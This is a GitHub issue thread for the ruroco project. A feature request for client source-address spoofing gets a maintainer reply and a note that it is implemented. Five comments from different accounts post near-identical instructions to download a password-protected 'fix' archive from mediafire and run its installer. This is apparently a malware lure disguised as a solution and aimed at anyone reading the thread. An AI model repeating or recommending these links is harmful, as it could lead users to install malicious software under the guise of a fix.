### ISSUE TITLE
Enable source spoofing for the client

### ISSUE THREAD

**Issue by alexxroche** [beac0n/ruroco#10]
In the config.toml $RUROCO_IP is invaluable for being able to add a dynamic IP to a firewall config. It could be nice if the client had the option to spoof the source address so that I can add nftables rules on behalf of other servers.

because /etc/rurocu/config.toml doesn't permit
```ini
 open_192.168.7.123 = "nft insert rule ip filter INPUT ip saddr ${COMMAND#*_} tcp dport 22 counter accept"
```
and is messy anyway because it has to anticipate the address, which could be a problem with dhcp.

**Comment by beac0n** [comment]
Would that be solved with https://github.com/beac0n/ruroco/issues/9 ? 

You could define the IP and set --strict to false

The only difference would then be that the server has to pick the IP from the data payload and not from the UDP packet IP src

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by beac0n** [comment]
implemented and will be available with next release
